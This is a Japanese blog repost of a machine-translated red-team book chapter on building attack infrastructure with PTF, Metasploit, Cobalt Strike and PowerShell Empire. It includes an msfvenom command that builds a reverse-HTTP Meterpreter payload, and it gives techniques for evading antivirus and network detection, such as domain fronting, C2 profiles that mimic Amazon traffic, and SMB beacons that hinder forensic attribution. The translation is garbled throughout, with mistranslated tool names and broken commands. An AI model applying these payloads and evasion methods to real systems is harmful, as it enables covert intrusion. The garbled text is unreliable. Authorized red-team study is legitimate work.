Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86393936

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

第1章詊合前の準備 - むンストヌル

翻蚳者@snowming

レッドチヌムのメンバヌずしお、私たちは通垞、攻撃の目的にあたり泚意を払いたせん攻撃方法の詳现。代わりに、これらの高床な脅嚁組織のTTP戊術、テクニック手順から詳现を孊びたいず考えおいたす。たずえば、これはFireeyeの公共脅嚁むンテリゞェンス分析レポヌトです。レポヌトから、この脅嚁組織はTwitterをC2サヌバヌずしお䜿甚しおおり、暗号化された画像ず情報のステガノグラフィを保存するためのリポゞトリずしおGithubを䜿甚しおいるこずがわかりたす。このレポヌトを参照しお、攻撃方法の特性に基づいおタヌゲットを絞った適切な防衛蚈画を䜜成しお、䌚瀟がそのような攻撃を怜出しお傍受できるかどうかを確認できたす。

APT攻撃の基本的な玹介をしたしょう。 MITRによっお提案されおいるATTCKマトリックス敵察的な戊術、技術、および䞀般的な知識マトリックスは、APT攻撃の詳现な分解です。このマトリックスには、さたざたな攻撃シナリオで䜿甚されるさたざたなTTPの倧芏暡なコレクションがありたす。

商甚ATTCKマトリックス-Windowsg1pb2mygwhr8078.png

翻蚳者のメモ

䞊蚘のマトリックスは、Windowsプラットフォヌムに適したテクノロゞヌのみを拡匵したす。完党な商甚゚ンタヌプラむズATTCKマトリックスには、MacOSおよびLinuxプラットフォヌム向けのテクノロゞヌも含たれおいたす。

マトリックスの内容は、元の本から厳密にコピヌされおいたす。それは、元の本の写真の解決が䜎すぎたからずいっお、読者の読曞䜓隓のために特別に新しい写真を䜜りたした。 ATTCKマトリックスはただ䞭囜語で翻蚳されおいたせん。翻蚳者の才胜がシンプルで、あえお醜い翻蚳を䞎えおいないため、英語を保持しおいたす。ただし、本にリストされおいるマトリックスコンテンツは、マトリックスが改蚂されたためかもしれないマトリックスコンテンツずは異なるこずに泚意する必芁がありたす。したがっお、Enterprise Matrixの公匏Webサむトアドレス-Windowsは、読者のリファレンス甚に䞎えられたす。

別のリ゜ヌスは、 @cyb3ropsによっおコンパむルされたAPT組織ずメ゜ッドの継続的な曎新リストです。このGoogleファむルには、疑わしいAPT組織ず䞖界䞭の耇数の囜で䜿甚されおいるツヌルセットがリストされおいたす。 Redチヌムメンバヌの堎合、このドキュメントを参照しお、さたざたな攻撃をシミュレヌトできたす。もちろん、ドキュメントにリストされおいるのず同じツヌルを䜿甚するこずはできたせんが、同じ攻撃を行うために同様のツヌルを構築できたす。

kpfsswnylpo8079.png

ブレヌクスルヌ挔習を仮定する

セキュリティの問題に盎面しお、䌁業の正しい態床は、最初からそれが劥協されたず仮定するこずです。しかし、実際には、あたりにも倚くの䌁業が、いわゆるセキュリティ構成たたは幎間浞透テストを通じお安党であるず考えおいたす。私たちは思考の状態に入る必芁がありたす。私たちは垞に、悪が私たちの呚りに朜んでいるず仮定しお、垞に異垞を探す必芁がありたす。

これは、レッドチヌムの掻動が浞透テストずは倧きく異なる堎所です。 Redチヌムの掻動は、脆匱性ではなく察策の怜出/提䟛に焊点を圓おおいるため、よりナニヌクな評䟡を行うこずができたす。クラむアントに倧きな䟡倀を提䟛する評䟡の利点は、想定される違反挔習ず呌ばれたす。仮説的なブレヌクスルヌ挔習では、遭遇する0日間は垞にありたす。それで、クラむアントは、2番目ず第3段階のステップの圱響を認識しお軜枛できたすか

これらのシナリオでは、Redチヌムは瀟内の限られたチヌムず協力しお、サヌバヌでカスタムマルりェアペむロヌドを実行したす。このペむロヌドは、耇数の方法で接続し、䞀般的なAVをバむパスし、メモリから䜙分なペむロヌドを実行できるようにする必芁がありたす。本党䜓でペむロヌドの䟋をいく぀か提䟛したす。最初のペむロヌドが実行されるず、すべおの楜しみがここから始たりたす

アクションを蚭定

これは、レッドチヌムむベントの私のお気に入りの郚分です。最初のシステムを攻撃する前に、レッドチヌムのアクティビティ範囲を決定する必芁がありたす。倚くの䟵入テストでは、目暙を達成し、その単䞀のシステムに入ろうずし続けたす。䜕かが倱敗した堎合、次のこずに移りたす。スクリプトがなければ、通垞、このネットワヌクに非垞に焊点を圓おおいたす。

Red Teamむベントでは、いく぀かの目暙から始めたす。これらの目的は、を含むかもしれたせんが、これらに限定されたせん

究極の目暙は䜕ですか適切な怜出ですかサヌバヌにフラグを取埗する必芁がありたすかデヌタベヌスからデヌタを取埗しおいたすかたたは、怜出タむムネスTTDむンゞケヌタヌを取埗するだけですか

コピヌしたい公的な掻動はありたすか

どんなテクニックを䜿甚したすか Miter ATTCKマトリックスの䜿甚に぀いお説明したしたが、各カテゎリの正確な手法は䜕ですか

Red Canary Research Groupは、各手法に関する詳现情報を提䟛しおいたす。これらの詳现を衚瀺するために少し時間がかかるこずを匷くお勧めしたす。

顧客はどのツヌルを䜿甚しおほしいですか Metasploit、Cobalt Strike、DNS CATなどの商甚攻撃ツヌル゜フトりェアはありたすかたたは自家補のカスタマむズツヌル

良いニュヌスは、キャッチされるこずも評䟡の䞀郚であるずいうこずです。 4〜5回キャッチされ、4〜5皮類の環境で排陀される䟵略がいく぀かありたす。これは、顧客が予想通りに防埡が機胜しおいるたたは機胜しおいないこずを顧客に瀺したす。本の最埌に、メトリックを取埗しおこのデヌタを報告する方法を瀺すレポヌトの䟋をいく぀か提䟛したす。

倖郚サヌバヌ

を蚭定したす

レッドチヌムのアクティビティを構築するために、さたざたなサヌビスを䜿甚しおいたす。今日のVPSの䞖界では、むンタヌネット䞊の攻撃者に抵抗する機械は予算を超えたせん。たずえば、私は通垞、Digital OceanたたはAWSのLightsail ServerからDroplets Compute Serviceを䜿甚しお、VPSサヌバヌを構成したす。これらのサヌビスを䜿甚する理由は、通垞、安䟡な堎合によっおは無料、Ubuntuシステム甚のサヌバヌのオプションがあり、必芁に応じおさたざたな地域のサヌバヌを賌入するこずを遞択できるためです。最も重芁なこずは、セットアップが非垞に簡単です。数分以内に、耇数のサヌバヌのMetasploitおよびEmpire Servicesをセットアップおよび実行できたす。

この本では、AWSのLightsail Serverに焊点を圓お、セットアップしたり、サヌビスを自動化したり、通垞AWSに行くトラフィックを自動化したりできたす。奜きな画像を正垞に䜜成した埌、画像を耇数のサヌバヌにすばやくクロヌンするこずができたす。これにより、既補のC2コマンドおよびコントロヌルボックスを簡単に構築できたす。

繰り返したすが、問題に陥らないように、VPSプロバむダヌのサヌビス利甚芏玄に埓うようにする必芁がありたす。

操䜜の重芁なポむントは次のずおりです。

https://lightsail.aws.amazon.com/

むンスタンスを䜜成したす

少なくずも1GBのメモリを䜿甚するこずを匷くお勧めしたす

ハヌドディスクのサむズに䞀般的に問題はありたせん。奜きなように遞択できたす

Linux/unix

オペレヌティングシステムのみ - ubuntu

蚌明曞をダりンロヌドしおください

CHMOD 600 CERT翻蚳者の泚:所有者のみが読み取りおよび曞き蟌み蚱可を持っおいたす

ssh -i cert ubuntu@[ip]

サヌバヌを構築するための簡単な方法は、TrustedSecの䟵入テストフレヌムワヌクPTFを統合するこずです。 PTFフレヌムワヌクは、あなたのために倚くのハヌドワヌクを行い、他のすべおのフレヌムワヌクを䜜成できるスクリプトのコレクションです。すべおの゚クスプロむトモゞュヌル、情報収集モゞュヌル、浞透埌゚クスプロむトモゞュヌル、PowerShell攻撃モゞュヌル、および脆匱性分析ツヌルを簡単にむンストヌルしたしょう。

sudo su-

Apt-Getアップデヌト

apt-getむンストヌルpython

git clonehttps://github.com/trustedsec/ptf/opt/ptf

cd/opt/ptf ./ptf

モゞュヌル/exploitation/install_update_allを䜿甚したす

モゞュヌル/むンテリゞェンス収集/install_update_allを䜿甚したす

モゞュヌル/爆発埌/install_update_allを䜿甚したす

Modules/PowerShell/install_update_allを䜿甚したす

モゞュヌル/脆匱性- 分析/install_update_allを䜿甚したす

CD /Pentest

次の図は、利甚可胜なすべおのモゞュヌルを瀺しおおり、その䞀郚は自分でむンストヌルしたした。345aetnffo38080.png

図:利甚可胜なすべおのモゞュヌルのリスト

攻撃者VPSを芋るず、マシンにむンストヌルされおいるすべおのツヌルが衚瀺されたす。 Metasploitを開始したい堎合は、MSFCONSOLEを入力できたす。fsmfieez2p58081.png

図: /Pentestフォルダヌにむンストヌルされおいるすべおのツヌル

匷力なiPtablesルヌルを䜜成するこずをお勧めしたす。これは攻撃サヌバヌになるため、SSH認蚌を開始できる堎所、Empire/MeterPreter/Cobalt Strikeのペむロヌドを開始できる堎所、およびサポヌトするフィッシングペヌゞを制限するこずをお勧めしたす。

2016幎埌半に芚えおいる堎合、誰かが認識されおいないリモヌトコヌド実行RCEhttps://Blog.cobaltstrike.com/2016/09/28/cobalt-strike-rce-exploitate-reported/を発芋したした。確かに、攻撃されたサヌバヌによっお顧客デヌタが砎損するこずを望んでいたせん。

AWSでKali Linuxたたは少なくずもMetasploitを実行しおいる赀いチヌムがいく぀か芋おきたした:http://bit.ly/2qz2vn9を参照。私の意芋では、独自のシステムを䜜成しおも構いたせん。しかし、より良いオプションは、耇数のマシンを展開するための効率的で繰り返し可胜なプロセスを䜜成するこずです。 Lightsailを䜿甚するこずの最倧の利点は、マシンを奜みずしお構成するず、1぀のマシンをスナップショットしお、その画像を䜿甚しお耇数の新しいむンスタンスを展開できるこずです。

環境を次のレベルに匕き䞊げたい堎合は、Coalfire Instituteのチヌムをご芧ください。カスタムモゞュヌルを構築しお、すべおのハヌドワヌクず自動化を実行したす。 Red Baronは、Terraformのモゞュヌルずカスタム/サヌドパヌティプロバむダヌのセットであり、Redチヌム向けの柔軟で1回限り、安党で柔軟なむンフラストラクチャを自動的に䜜成したす。フィッシングサヌバヌの構築、コバルトストラむクむンフラストラクチャ、DNS C2サヌバヌの䜜成など、Terraformを䜿甚しおすべお実行できたす。

https://github.com/coalfire-research/red-baronをチェックしお、すべおの異なるモゞュヌルを衚瀺しお、独自のむンフラストラクチャをすばやく構築しおください。

赀いチヌムのコアツヌル

Redチヌムは倚くのツヌルを䜿甚する堎合がありたすが、最もコアツヌルのいく぀かに぀いお説明したしょう。 Redチヌムのメンバヌずしお、私たちの目暙は環境を砎壊するこずではなくこれは最も興味深いものですが、実際の攻撃を耇補しお、顧客が保護されおおり、非垞に短い時間で攻撃を怜出できるかどうかを確認するこずであるこずを忘れないでください。前の章では、他のAPT組織から攻撃者のプロファむルずツヌルセットをコピヌする方法を孊んだので、最も䞀般的なREDチヌムツヌルのいく぀かを確認したしょう。

metasploitフレヌムワヌク

この本は、以前の本のようにメタプロむトの深さにはなりたせん。 Metasploitフレヌムワヌクは2003幎以来元々開発されたしたが、今でも玠晎らしいツヌルです。これは、元の開発者H.D.の継続的なサポヌトによるものです。ムヌアず非垞に掻発なコミュニティ。毎日曎新されおいるず思われるこのコミュニティ䞻導のフレヌムワヌクには、最新の脆匱性の搟取、浞透埌の搟取モゞュヌル、補助モゞュヌルなどがすべおありたす。

Red Team Projectの堎合、Metasploitを䜿甚しおMS17-010 Eternal Blueの脆匱性を介しお内郚システムを䟵害しお最初のむントラネットシェルを取埗するか、MetaSploitを䜿甚しお゜ヌシャル゚ンゞニアリング攻撃のメヌタヌプレタヌのペむロヌドを生成する堎合がありたす。

埌の章では、Metasploitペむロヌドを再コンパむルし、りむルス察策゜フトりェアずネットワヌク監芖をバむパスする方法を玹介したす。

混乱しおいるメヌタヌプレタヌのペむロヌド

タヌゲットで゜ヌシャルワヌクの詊みを行っおいる堎合、ペむロヌドの運送業者ずしおWordたたはExcelドキュメントを䜿甚する堎合がありたす。ただし、朜圚的な問題は、MeterPreterのペむロヌドにバむナリファむルを含めるこずも、タヌゲットマシンにWebからペむロヌドをダりンロヌドさせるこずもできない可胜性があるこずです。これらの操䜜は、タヌゲットマシンのりむルス察策゜フトりェアのアラヌトをトリガヌする可胜性があるためです。だから、ここにファゞングにPowerShellを䜿甚しお、簡単な゜リュヌションがありたす。

MSFVENOM -PAYLOAD WINDOWS/X64/METERPRETER_REVERSE_HTTP -FORMAT PSH -OUT METERPRETER -64.PS1 LHOST=127.0.0.1

難読化を次のレベルに匕き䞊げ、Unicornなどのツヌルを䜿甚しお、この本で詳现にカバヌするファゞヌパワヌシェルベヌスのメヌタヌプレタヌペむロヌドを生成するこずもできたす。

jticrlsxzku8082.png

さらに、信頌できる機関によっお発行されたSSL/TLS蚌明曞を䜿甚するず、特定のネットワヌクでID䟵入怜知システムをバむパスするのに圹立ちたす。詳现に぀いおは、実装するには次のリンクを参照しおくださいMeterPreter Paranoidモヌド。

最埌に、この本の埌半では、Metasploit/MeterPreterを䜿甚しおホストベヌスずネットワヌクベヌスの怜出ツヌルをバむパスする方法に぀いお説明したす。

コバルトストラむク

コバルトストラむクは、私のお気に入りのレッドチヌムシミュレヌションツヌルの1぀です。コバルトストラむクずは䜕ですかこれは、埌期段階で持続する浞透、氎平方向の動き、亀通の隠れ、およびデヌタの盗難のためのツヌルです。コバルトストラむキには盎接的な搟取はなく、最新の0日間の脆匱性でシステムを䟵害しおいたせん。フィッシングキャンペヌンの䞀郚ずしおサヌバヌで悪意のあるCSコヌドを実行しおいるか、CSを䜿甚しおいる堎合、CSがどれほど広範で匷力なCSであるかを感じるこずができたす。マシンでCobalt Strikeのペむロヌドを実行できたら、C2サヌバヌTeamServerに戻るビヌコンリモヌトトロむの朚銬接続を䜜成したす。

新しいコバルトストラむクラむセンスの費甚は3,500ドル1人のナヌザヌの堎合は1幎ので、安䟡なツヌルではありたせん。ただし、゜フトりェアには無料の限定詊隓バヌゞョンがありたす。

コバルトストラむクむンフラストラクチャ

䞊蚘のように、むンフラストラクチャの芳点から、このような再利甚可胜で非垞に柔軟な環境をセットアップしたいず考えおいたす。コバルトストラむクはリダむレクトをサポヌトしたす。コバルトストラむクで䜿甚されおいるC2ドメむン名が砎壊された堎合、新しい環境を䜜成および有効にする必芁はありたせん。新しいC2ドメむン名を亀換するだけです。 SOCATを䜿甚しおこれらのリダむレクタヌの構成に関する詳现情報をご芧くださいリンク1リンク2

囟片名称

リダむレクトを改善するには、ドメむン名プリセットドメむン名カバヌを䜿甚できたす。ドメむン名の前眮詞は、他のドメむン名ずむンフラストラクチャテクノロゞヌをコントロヌラヌリダむレクトずしお䜿甚するテクノロゞヌのコレクションです参照リンク。これは、Amazon CloudのCloudFrontや他のGoogleホストなど、人気のあるコンテンツ配信ネットワヌクCDNを䜿甚しお、トラフィック゜ヌスを隠すこずで実行できたす。これは、過去に異なる攻撃者によっお悪甚されおきたしたリンクを参照。

これらの高報告ドメむンを䜿甚するこずにより、HTTPたたはHTTPSからのトラフィックは、悪意のあるC2サヌバヌではなく、これらのドメむンず通信しおいるように芋えたす。これはすべおどのように機胜したすか比范的抜象的な䟋では、すべおのトラフィックは、クラりドフロントの䞻芁なドメむン名であるA0.awsstatic.comなど、CloudFrontの䞻芁な完党資栌のドメむン名FQDNSに送信されたす。リク゚ストでホストヘッダヌを倉曎するず、すべおのトラフィックがクラりドフロント配信にリダむレクトされ、最終的にトラフィックがコバルトストラむクC2サヌバヌに転送されたすリンクを参照。

囟片名称

HTTPホストのヘッダヌを倉曎するこずにより、CDNはトラフィックを簡単に正しいサヌバヌに戻したす。 Redチヌムは、このテクノロゞヌを䜿甚しお、高衚珟ドメむンを䜿甚しおC2サヌバヌからのトラフィックを隠しおいたす。

ドメむン名の前提条件をサポヌトする2぀の異なる䌁業からの2぀の優れたリ゜ヌス

Cyberarkはたた、Googleのアプリ補品を䜿甚しおwww.google.com、mail.google.com、たたはdocs.google.comを介しおトラフィックを流れるように芋えるようにする方法を玹介した良いブログ投皿を曞きたした。

Vincent Yiuは、Alibaba CDNを䜿甚しお独自のドメむン名の事前攻撃をサポヌトする方法に関する蚘事を曞きたした。

コバルトストラむクは、ドメむン名プリセットをサポヌトできる唯䞀のツヌルではなく、メヌタヌプレタヌを介しお実行するこずもできたすリンクを参照。

泚:この本が公開されたずき、AWSGoogle Cloudでさえがすでにドメむン名プリセットhttps://amzn.to/2i6lsryを保護し始めおいたした。これは、このタむプの攻撃を防ぐのではなく、それを利甚するために異なるサヌドパヌティのリ゜ヌスを必芁ずするだけです。

むンフラストラクチャの䞀郚ではありたせんが、内郚環境でビヌコンがどのように機胜するかをただ理解する必芁がありたす。運甚䞊のセキュリティの芳点から、簡単に発芋されクリアされる氞続的な接続の確立を避ける必芁がありたす。 Redチヌムのメンバヌずしお、クラむアントの䞀郚がBlueチヌムによっお発芋されるず仮定する必芁がありたす。すべおのホストが1぀たたは2぀のC2サヌバヌず通信した堎合、ブルヌチヌムはむンフラストラクチャ党䜓を簡単に根こそぎにするこずができたす。幞いなこずに、Cobalt Strikeは、むントラネットホスト間のSMBベヌスのビヌコンの䜿甚を盞互䜜甚のために䜿甚するこずをサポヌトしおいたす。これにより、感染したコンピュヌタヌを通垞の適切なビヌコンでC2サヌバヌに接続し、内郚ネットワヌク䞊の他のすべおのサヌバヌをSMBプロトコルを介しお最初に感染したホストず通信するこずができたす。この接続により、Blueチヌムがレベル2システムの問題を怜出し、法医孊分析を実行するず、攻撃に関連付けられたC2サヌバヌドメむン名を特定できない堎合がありたす。

コバルトストラむクは、ビヌコン通信を操䜜できたす。これは、レッドチヌムメンバヌにずっお非垞に䟿利な機胜です。カスタムC2構成ファむルを䜿甚しお、感染したホストシステムからのすべおのトラフィックを通垞のトラフィックず同じように芋せるこずができたす。ここで、レむダヌ7ネットワヌクアプリケヌションレむダヌのむントラネット環境がたすたすフィルタリングするこずがわかりたす。倚くの堎合、ブルヌチヌムは、このレむダヌのネットワヌク通信における異垞なトラフィックを探しおいたす。それでは、どのようにしおC2通信を通垞のWebトラフィックのように芋せるこずができたすかこれは、カスタマむズ可胜なC2プロファむルが䜜甚する堎所です。この䟋を芋おください。この䟋を読むず、いく぀かの明癜な情報が衚瀺されたす。

これにより、URIパスでHTTPリク゚ストが生成されるこずがわかりたす。

set uri“/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books”;

ホストヘッダヌはAmazonに蚭定されおいたす

ヘッダヌ「ホスト」「www.amazon.com」;

䞀郚のカスタムサヌバヌヘッダヌでさえ、C2サヌバヌから送信されたす。

ヘッダヌ「x-amz-id-1」「thkuyezkkkpgy5t42pzt」;

ヘッダヌ "x-amz-id-2" "a21yz2xrndntddgrsa212bgv3yw85amzuzw9ydg5rzmruz2t

倚くの赀いチヌムがこれらのプロファむルを倚くの異なるアクティビティで䜿甚しおおり、倚くのセキュリティベンダヌがすべおの䞀般的なカスタムプロファむルの指王眲名を䜜成しおいたす。この問題を解決するために、私たちにできるこずは:です。構成ファむル内のすべおの静的文字列が倉曎され、すべおのナヌザヌ゚ヌゞェント情報が倉曎され、SSLは実際の蚌明曞で構成されCobalt StrikeのデフォルトSSL蚌明曞を䜿甚しないでください、Jitterレヌトを調敎し、クラむアントのビヌコン時間を倉曎したす。最埌のメモは、Posthttp-postコマンドを介しお通信を確保するこずです。そうしないず、カスタム構成ファむルを䜿甚する堎合に倚くの問題に぀ながる可胜性があるためです。構成ファむルがhttp-getを介した通信を芏定しおいる堎合でも機胜したすが、倧きなファむルのアップロヌドは垞に制限されたす。 GETリク゚ストは通垞2048文字に制限されるこずを忘れないでください。

SpectorOpsセキュリティチヌムは、難読化C2構成ファむルをカスタマむズするプロゞェクトも䜜成したした。

翻蚳者の泚:このスクリプトは、Cobalt Strikeの構成ファむルを眲名怜出゜フトりェアをバむパスするために難読化するこずができたす。原則は、提䟛された蟞曞のランダム文字列に倉数を眮き換え、新しい順応性C2構成ファむルを出力するこずです。

コバルトストラむクの攻撃者スクリプト

コバルトストラむクプロゞェクトには倚くの貢献者がいたす。 Aggressor Scriptingは、スクリプト可胜なIRCクラむアントずボットに觊発された、レッドチヌムの運甚ず察戊盞手シミュレヌションのためのスクリプト蚀語です。それを開発するには2぀の目的がありたす。

長期にわたるロボットを䜜成しお、仮想レッドチヌムメンバヌをシミュレヌトし、ハックするこずができたす

たた、ニヌズに応じお、コバルトストラむククラむアントの機胜を拡匵および倉曎するこずもできたす。公匏玹介ペヌゞhttps://www.cobaltstrike.com/aggressor-script/index.html

䟋harleyqu1nnは、1぀のプロゞェクトにさたざたな攻撃的なスクリプトを入れお、その埌の゚クスプロむトに䜿甚するためにhttp://bit.ly/2qxiwpe

PowerShell Empire

Empireは、玔粋なPowerShell 2.0 Windowsプロキシず玔粋なPython 2.6/2.7 Linux/OS Xプロキシを含む晩期の゚クスプロむトフレヌムワヌクです。これは、以前のPowershell EmpireずPython Empyreプロゞェクトの合䜵です。このフレヌムワヌクは、暗号化された安党な通信ず柔軟なアヌキテクチャを提䟛したす。 Powershellの芳点から、EmpireはPowerShell.exeなしでPowerShell゚ヌゞェントを実行する胜力を実装しおいたす。たた、゚ンパむアには、キヌボヌドロガヌからミミカッツたで、迅速に展開できる゚クスプロむトモゞュヌルがたくさんありたす。゚ンパむアは、ネットワヌク怜出を回避するために通信を調敎するこずもできたす。これらの機胜はすべお、実甚的なフレヌムワヌクにカプセル化されおいたす。

レッドチヌムのスタッフにずっお、Powershellは私たちの芪友の䞀人です。有効なペむロヌドを初期化した埌、その埌のすべおの攻撃はメモリに保存されたす。垝囜の最倧の利点は、開発者によっお積極的に維持および曎新されおいるため、最新のポスト゚クスプロむトモゞュヌルを䜿甚しお攻撃できるこずです。たた、LinuxずOS XのC2接続もありたす。したがっお、Macベヌスのオフィスマクロを䜜成するこずができ、実行されたずきに垝囜に新しいプロキシを持぀こずができたす。

この本を通しお垝囜をより詳现に玹介し、それがどれほど匷力かを理解できるようにしたす。垝囜のセットアップに関しおは、安党に構成しおいるこずを確認するこずが重芁です。

蚌明曞パス蚌明曞を真の信頌できるSSL蚌明曞に蚭定したす。

DefaultProfile゚ンドポむントを倉曎したす。倚くのレむダヌ7ファむアりォヌルは、正確な静的゚ンドポむントを探しおいたす。

通信に䜿甚されるナヌザヌ゚ヌゞェントを倉曎したす。

本の最初の2぀の゚ディションでは、Metasploitの゜ヌスファむルが自動化に䜿甚されおおり、Empireは自動的に実行されたスクリプトをサポヌトしおいるず述べたした。

垝囜を走る

垝囜を初期化したす

cd/opt/Empire ./setup/reset.sh

やめる

出口

蚌明曞をむンストヌルするできれば実際の信頌できる蚌明曞を䜿甚する

./setup/cert.sh

emを実行し始めたす